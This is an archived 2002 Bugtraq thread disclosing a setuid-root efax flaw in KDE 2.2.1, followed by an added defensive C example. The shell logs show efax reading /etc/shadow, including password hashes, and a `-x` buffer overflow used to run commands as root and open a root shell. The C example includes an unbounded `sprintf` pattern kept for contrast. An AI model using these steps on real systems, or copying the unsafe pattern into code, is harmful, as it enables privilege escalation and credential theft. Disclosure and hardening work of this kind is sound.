[23888] in bugtraq
Re: efax
daemon@ATHENA.MIT.EDU (H D Moore)
Wed Jan 16 21:18:53 2002
Message-ID: <20020116095328.1877.qmail@securityfocus.com>
Content-Type: text/plain;
charset="iso-8859-1"
From: H D Moore <sflist@digitaloffense.net>
To: "Wodahs Latigid" <wodahs@mail.com>
Date: Wed, 16 Jan 2002 03:55:27 -0600
Cc: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
In-Reply-To: <20020116090324.77325.qmail@mail.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Since this is getting cc'd to bugtraq, here is a little background:
The version of efax I have was part of a kde-2.2.1 source build and install.
The efax program was shipped as part of the klprfax app in the kdeutils
package. The makefile sets this binary to be setuid root on install:
hdm@sliver:~/kdeutils-2.2.1/klprfax > grep chown . -r
./efax/fax: case $OWNER in '') ;; *) chown $OWNER /dev/$DEV ;; esac
./efax/Makefile: @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./efax/Makefile.am: @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./efax/Makefile.in: @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./klprfax/klprfax_lpd.in: chown root $SPOOL/klprfax
./klprfax/klprfax_lpd: chown root $SPOOL/klprfax
hdm@sliver:~/kdeutils-2.2.1/klprfax >
This has been fixed in KDE 2.2.2 and I have not seen a distro yet that ships
with efax installed suid root. However, if you installed KDE 2.2.1 from source,
then there is a good chance your efax binary is still setuid.
I posted a message to vuln-dev, stating that I found a setuid copy of efax and
that I was able to read arbitrary files with the -d parameter (/etc/shadow).
Wodahs responded saying he found an overflow in the -x parameter.
The overflow that he found is easily exploitable:
Running /bin/id:
hdm@sliver> efax -x $EX
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:10 compiled Aug 16 2001 10:23:23
efax: 43:10 Error: can't open pre-lock file <nops>^)FF
S
̀)@̀/bin/idA/TMP..08795: File name too long
uid=500(hdm) gid=100(users) euid=0(root) groups=100(users)
Getting a root shell:
hdm@sliver > echo 'void main(void){setuid(0);system("/bin/sh");}' > /tmp/ex.c
hdm@sliver > gcc -o /tmp/ex /tmp/ex.c
/tmp/ex.c: In function `main':
/tmp/ex.c:1: warning: return type of `main' is not `int'
hdm@sliver > export EX=`perl genshell.pl 1029 $ADDR`
shell code is: 43 bytes
hdm@sliver > efax -x $EX
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 46:21 compiled Aug 16 2001 10:23:23
efax: 46:21 Error: can't open pre-lock file <nops>^)FF
S
̀)@̀/tmp/exA/TMP..08846: File name too long
sh-2.04#
On Wednesday 16 January 2002 03:03 am, Wodahs Latigid wrote:
> I found a buffer overflow in efax a while back,
> reported it and didn't get a response. Here's
> the original email:
> -----------------------------------------------
> To: edc@cce.com
> Subject: Efax Buffer Overflow
> You may or not be interested (as this has no
> major impact on the outside world), but there
> is a buffer overflow in the -x function of
> efax. Obviously, efax should not be setuid
> root, but I can imagine a situation with an
> administrator doing so to give "trusted" users
> access to the fax facility.
> -----------------------------------------------
>
> And here's more detail:
>
> # cat /etc/mandrake-release
> Linux Mandrake release 8.0 (Traktopel) for i586
>
> Starting program: /usr/bin/efax -x `perl -e "print 'A' x 1200"`
> /usr/bin/efax: Wed Jan 16 09:54:49 2002 efax v 0.9 Copyright 1999 Ed Casas
> efax: 54:49 Error: can't open pre-lock file AAAA..[A's Cut]..AAAATMP..25717: File name too long
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) inf reg
> .. stuff cut ..
> edx 0x65656565 1701143909
> ebx 0x41414141 1094795585
> esp 0xbffefd58 0xbffefd58
> ebp 0x41414141 0x41414141
> esi 0x41414141 1094795585
> edi 0x41414141 1094795585
> eip 0x41414141 0x41414141
> .. stuff cut ..
>
> Digital Shadow
> http://www.ministryofpeace.co.uk/
>
>
>
> -----Original Message-----
> From: H D Moore <sflist@digitaloffense.net>
> Date: Tue, 15 Jan 2002 18:44:57 -0600
> To: VULN-DEV@SECURITYFOCUS.COM
> Subject: efax
>
> > Didn't see this mentioned before...
> >
> > hdm@sliver:~ > which efax
> > /opt/kde2/bin/efax
> > hdm@sliver:~ > ls -la /opt/kde2/bin/efax
> > -rwsr-xr-x 1 root root 96689 Aug 16 10:23 /opt/kde2/bin/efax
> > hdm@sliver:~ > efax -h
> > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: 43:28 compiled Aug 16 2001 10:23:23
> > efax: 43:28 Error: no argument for (-h)
> > Usage:
> > efax [ option ]... [ -t num [ file... ] ]
> > Options:
> > -a str use command ATstr to answer
> > -c cap set modem and receive capabilites to cap
> > -d dev use modem on device dev
> > -e cmd exec "/bin/sh -c cmd" for voice calls
> > -f fnt use (PBM) font file fnt for headers
> > -g cmd exec "/bin/sh -c cmd" for data calls
> > -h hdr use page header hdr (use %d's for current page/total pages)
> > -i str send modem command ATstr at start
> > -j str send modem command ATstr after set fax mode
> > -k str send modem command ATstr when done
> > -l id set local identification to id
> > -o opt use protocol option opt:
> > 0 use class 2.0 instead of class 2 modem commands
> > 1 use class 1 modem commands
> > 2 use class 2 modem commands
> > a if first [data mode] answer attempt fails retry as fax
> > e ignore errors in modem initialization commands
> > f use virtual flow control
> > h use hardware flow control
> > l halve lock file polling interval
> > n ignore page retransmission requests
> > r do not reverse received bit order for Class 2 modems
> > x use XON instead of DC2 to trigger reception
> > z add 100 ms to pause before each modem comand (cumulative)
> > -q ne ask for retransmission if more than ne errors per page
> > -r pat save received pages into files pat.001, pat.002, ...
> > -s share (unlock) modem device while waiting for call
> > -v lvl print messages of type in string lvl (ewinchamr)
> > -w don't answer phone, wait for OK or CONNECT instead
> > -x fil use uucp-style lock file fil
> > Commands:
> > -t dial num and send fax image files file...
> > efax: 43:28 done, returning 2 (unrecoverable error)
> > hdm@sliver:~ > efax -d /etc/shadow
> > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: 43:35 compiled Aug 16 2001 10:23:23
> > efax: 43:35 opened /etc/shadow
> > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> > efax: 43:35 Warning: unexpected response "root:sjSs9mscTsosA:11521:0:10000::::"
> > efax: 43:35 Warning: unexpected response "bin:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "daemon:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "lp:*:9473:0:10000::::"
> > efax: 43:35 Warning: unexpected response "news:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "uucp:*:0:0:10000::::"
> > efax: 43:35 Warning: unexpected response "games:*:0:0:10000::::"
> > efax: 43:35 Warning: unexpected response "man:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "at:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "lnx:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "mdom:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "yard:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "wwwrun:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "squid:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "postgres:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fax:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "gnats:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "empress:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "adabas:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "amanda:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "ixess:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "irc:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "ftp:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "firewall:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "informix:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "named:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "virtuoso:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fnet:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "gdm:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "postfix:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "cyrus:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "nps:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "skyrix:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "dbmaker:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fixadm:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fib:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fixlohn:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "mysql:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "dpbox:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "ingres:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "codadmin:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "zope:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "vscan:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "wnn:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "pop:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "perforce:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "nobody:*:0:0:10000::::"
> > efax: 43:35 Warning: unexpected response "hdm:snBsN0stfzsMg:11564:0:99999:7:0::"
> > efax: 43:35 Warning: unexpected response "oracle:!:11556:0:99999:3:0::"
> > efax: 43:35 Warning: unexpected response "yaku:!:11636:0:99999:3:0::"
> > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> > efax: 43:35 sync: dropping DTR
> > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> > efax: 43:36 sync: sending escapes
> > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> > efax: 43:37 Error: sync: modem not responding
> > efax: 43:37 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
> > efax: 43:37 done, returning 2 (unrecoverable error)
> >
> > --
> > H D Moore
> > http://www.digitaldefense.net - work
> > http://www.digitaloffense.net - play
--
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play
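Two defender-side checks the thread above points to, as an added example that is not efax's source nor either poster's code: the bounded construction of the pre-lock path that the "-x" overflow lacks, beside the unbounded pattern for contrast, and a stat()-based audit for the "chown root && chmod 4755" the kdeutils Makefile performs. The "<lockarg>/TMP..<pid>" layout is an assumption read off the "can't open pre-lock file" message, and the 128-byte buffer is a constructed size for the demo.

```c
/* Added illustration, not efax's own source: the two checks a defender takes
 * from the report above.  The "<lockarg>/TMP..<pid>" layout is an assumption
 * read off the "can't open pre-lock file ..." message. */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* The pattern behind the "-x" crash: an argument of attacker-chosen length
 * formatted into a fixed stack buffer with no bound, so 1200 bytes of 'A'
 * run past the buffer into the saved frame (the 0x41414141 in ebp/eip above).
 * Shown only for contrast; the bounded version below is the one to use. */
void build_prelock_path_unbounded(char *out, const char *lockarg, long pid)
{
    sprintf(out, "%s/TMP..%05ld", lockarg, pid);   /* no length check at all */
}

/* Hardened form: snprintf reports the length the full path would need, and
 * anything that does not fit is rejected instead of silently truncated.
 * Returns 0 and fills out[] on success, -1 with out[] empty otherwise. */
int build_prelock_path(char *out, size_t outsz, const char *lockarg, long pid)
{
    int n = snprintf(out, outsz, "%s/TMP..%05ld", lockarg, pid);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz) out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Install audit for the Makefile's "chown root && chmod 4755": returns 1 if
 * path is a regular file that is setuid and owned by root, 0 if not, -1 if it
 * cannot be stat'ed.  Run it over the efax binary after a from-source build. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    return (S_ISREG(st.st_mode) && (st.st_mode & S_ISUID) && st.st_uid == 0) ? 1 : 0;
}

int main(void)
{
    char buf[128], longarg[1200];                /* 128: constructed buffer size */
    memset(longarg, 'A', sizeof longarg - 1);
    longarg[sizeof longarg - 1] = '\0';
    printf("short arg   : %d -> %s\n", build_prelock_path(buf, sizeof buf, "/var/lock", 8795), buf);
    printf("1199 x 'A'  : %d\n", build_prelock_path(buf, sizeof buf, longarg, 8795));
    printf("efax setuid root? %d\n", is_setuid_root("/opt/kde2/bin/efax"));
    return 0;
}
```

A result of 1 from is_setuid_root() on a from-source KDE 2.2.1 install is the condition the post describes; clearing the bit with chmod u-s removes both the -d file read and the -x overflow as privilege-escalation paths.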